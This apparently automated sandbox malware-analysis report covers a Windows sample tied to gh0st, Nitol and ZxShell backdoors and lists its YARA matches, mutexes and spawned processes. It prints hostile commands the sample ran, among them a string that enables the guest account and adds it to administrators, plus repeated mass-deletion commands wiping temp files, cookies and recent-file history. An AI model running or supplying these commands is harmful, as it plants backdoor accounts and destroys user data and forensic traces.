                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100637608_2_10063760
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10046F908_2_10046F90
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10040FC08_2_10040FC0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1001BFD08_2_1001BFD0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1003A7D08_2_1003A7D0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100287F08_2_100287F0
                Source: C:\Windows\Temp\ .exeCode function: String function: 00401B10 appears 2588 times
                Source: C:\Windows\Temp\ .exeCode function: String function: 0044991C appears 59 times
                Source: C:\Windows\Temp\ .exeCode function: String function: 00456F8E appears 53 times
                Source: C:\Windows\Temp\ .exeCode function: String function: 00454F3B appears 2661 times
                Source: C:\Windows\Temp\ .exeCode function: String function: 00459697 appears 31 times
                Source: C:\Windows\Temp\ .exeCode function: String function: 004483B0 appears 122 times
                Source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.000000000297D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe
                Source: G3izWAY3Fa.exe, 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe
                Source: G3izWAY3Fa.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: dump.pcap, type: PCAPMatched rule: gh0st author = https://github.com/jackcr/
                Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
                Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st author = https://github.com/jackcr/
                Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: gh0st author = https://github.com/jackcr/
                Source: v5.exe, 00000002.00000002.1330252488.000000000075A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u.sLN
                Source: classification engineClassification label: mal84.spre.bank.troj.spyw.evad.winEXE@113/11@12/4
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,3_2_10011F80
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0043A410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,InitiateSystemShutdownA,5_2_0043A410
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043A500
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043AD30
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,5_2_0043ADF0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,8_2_10011F80
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041CD
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,3_2_100018A0
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
                Source: C:\Windows\Temp\v5.exeCode function: 2_2_00405244 LoadLibraryA,6D0C6DE0,FindResourceA,LoadResource,LockResource,wsprintfA,WriteFile,WriteFile,SetFilePointer,lstrlen,WriteFile,CloseHandle,2_2_00405244
                Source: C:\Windows\Temp\v5.exeCode function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,2_2_0040597D
                Source: C:\Windows\Temp\v5.exeCode function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,2_2_0040597D
                Source: C:\Windows\Temp\v5.exeCode function: 4_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,4_2_0040597D
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
                Source: C:\Windows\SysWOW64\033726\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_03
                Source: C:\Windows\Temp\server.exeMutant created: \Sessions\1\BaseNamedObjects\AAAAAArrGvvbOnvbCzvbGwsKmnr6+vnw==
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                Source: C:\Windows\Temp\v5.exeMutant created: \BaseNamedObjects\Defghi Klmnopqr Tuv
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:660:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3280:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile created: C:\Users\user\AppData\Local\Temp\nswC4F8.tmpJump to behavior
                Source: G3izWAY3Fa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: G3izWAY3Fa.exeVirustotal: Detection: 70%
                Source: G3izWAY3Fa.exeReversingLabs: Detection: 86%
                Source: server.exeString found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
                Source: svchost.exeString found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeFile read: C:\Users\user\Desktop\G3izWAY3Fa.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\G3izWAY3Fa.exe "C:\Users\user\Desktop\G3izWAY3Fa.exe"
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"
                Source: unknownProcess created: C:\Windows\Temp\v5.exe C:\Windows\temp\v5.exe
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"
                Source: C:\Windows\Temp\v5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\server.exeProcess created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"
                Source: C:\Windows\SysWOW64\033726\svchost.exeProcess created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"
                Source: unknownProcess created: C:\Windows\XXXXXX05CA35CC\svchsot.exe "C:\Windows\XXXXXX05CA35CC\svchsot.exe"
                Source: unknownProcess created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe "C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe" Jump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe" Jump to behavior
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeProcess created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe" Jump to behavior
                Source: C:\Windows\Temp\v5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nulJump to behavior
                Source: C:\Windows\Temp\server.exeProcess created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe" Jump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
